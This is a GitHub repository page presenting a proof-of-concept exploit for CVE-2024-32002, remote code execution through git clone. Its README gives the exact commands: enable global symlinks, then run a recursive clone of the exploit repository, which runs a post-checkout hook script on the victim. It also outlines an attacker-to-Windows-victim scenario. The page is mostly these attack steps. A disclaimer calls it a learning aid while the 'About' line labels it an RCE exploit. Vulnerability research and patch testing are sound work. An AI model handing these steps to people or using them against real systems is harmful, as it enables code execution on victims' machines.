Nothing Special   »   [go: up one dir, main page]

Skip to content

EQSTLab/git_rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2024-32002 PoC

  1. You must set up the git's symbolic link option like:
git config --global core.symlinks true
  1. Then exploit CVE-2024-32002 by the following command:
git clone --recursive https://github.com/EQSTSeminar/git_rce.git

Attack Scenario

kali(192.168.216.129) --Give remote repository address--> Win(192.168.216.130)

kali(192.168.216.129) <--Git clone && hook script(post-checkout) execution-- Win(192.168.216.130)

Disclaimer

This repository is not intended to be git clone RCE exploit to CVE-2024-32002. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

About

git clone rce CVE-2024-32002

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published